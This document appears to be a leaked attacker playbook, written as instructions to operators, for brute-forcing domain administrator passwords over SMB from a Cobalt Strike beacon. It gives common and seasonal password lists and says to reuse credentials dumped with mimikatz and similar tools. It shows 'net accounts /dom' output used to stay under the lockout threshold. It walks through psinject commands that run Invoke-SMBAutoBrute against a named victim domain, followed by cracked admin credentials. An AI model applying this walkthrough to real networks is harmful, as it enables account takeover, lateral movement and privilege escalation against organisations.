```SMB AUTOBRUT
You should have passwords for this attack.
   -  the ones that were dumped with SharpChrome 
   -   dumped with SeatBelto
   -   dumped with mimicatz and other tools while working inside network
And in general any others, such as those found in the files
   
If there are fewer passwords than we need in order to launch a bruteforce attack, we can safely add them from the following list of the most common in the corporate environment.

Password1
Hello123
password
Welcome1
banco@1
training
Password123
job12345
spring
food1234


We also recommend using password lists based on seasons and the current year. Considering that passwords change every three months, you can take a "reserve" to generate such a list.
For example, in August 2020 we create the following list

June2020
July2020
August20
August2020
Summer20
Summer2020
June2020!
July2020!
August20!
August2020!
Summer20!
Summer2020!

All of the passwords above fall into either 3 of 4 Active Directory password requirements (which is enough for users to set them), or even all 4 requirements.
Note: we are considering the most popular variant of the requirements.


   
   Scenario with domain administrators
1.   Select the list of domain administrators with the command "shell net group "domain admins" /dom"
   Write the obtained data into the file admins.txt
   
2.   Upload this file to the host in the folder C:\ProgramData

3.   Request information on domain account blocking policy (protection against bruteforce)
   
   beacon> shell net accounts /dom
   

    Tasked beacon to run: net accounts /dom
    host called home, sent: 48 bytes
    received output:


   The request will be processed at a domain controller for domain shookconstruction.com.
   Force user logoff how long after time expires?:       Never
   Minimum password age (days):                          1
   Maximum password age (days):                          42
   Minimum password length:                              6
   Length of password history maintained:                24
   Lockout threshold:                                    Never
   Lockout duration (minutes):                           30
   Lockout observation window (minutes):                 30
   Computer role:                                        BACKUP

   НWe are interested in the parameter Lockout threshold, which often contains a certain numeric value, which in the future we must use as a parameter (in this case stands Never - means that the protection against password brute force is disabled.

   In this guide, we'll indicate a value of 5 as the approximate most commonly encountered value.
   The Minimum password length parameter specifies the minimum allowed number of characters of the password, it is required to filter our "list" of passwords.
   
4. In the source code of the script specify the domain in which the script will run
   -   string             $context = new-object System.DirectoryServices.ActiveDirectory.DirectoryContext("Domain","shookconstruction.com")

5.   Import and run the script
   powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1
   psinject 4728 x86 Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
   -   4728 in this case it is the current pid, and x86 its bit size
   -   The list of passwords consists of one that we "found" and two from the list of popular passwords
   
6.   Watch the progress of the running script and pay attention to the result
   

    Success! Username: Administrator. Password: 1qazXDR%+
    Success! Username: CiscoDirSvcs. Password: 1qazXDR%+


   
   We've successfully bruteforced two domain administrators.
   
========================================================================
   
   A scenario without a list of users differs in only two things.

   -   psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5
      We don't specify parameters UserList and ShowVerbose. The absence of the first means that the search will be performed on ALL users in the domain, the absence of the second indicates that only the Successful results will be displayed.
   
   I will not wait in the video guide to the end of the script that will search all user / password pairs in the domain, I will show only the output.
   
   

    Success! Username: Administrator. Password: 1qazXDR%+
    Success! Username: CiscoDirSvcs. Password: 1qazXDR%+
    Success! Username: support. Password: 1qazXDR%+
    Success! Username: accountingdept. Password: 1qazXDR%+   


   
   As you can see we were able to find accounts of other users that may be useful for further latheral movement on the network and priviledges escalation.

   If there is no positive result, you can repeat after some time (optimal to multiply by two the Lockout duration parameter before the next attempt) with a new list of passwords.
   The end of the script will be indicated by a message in the beacon
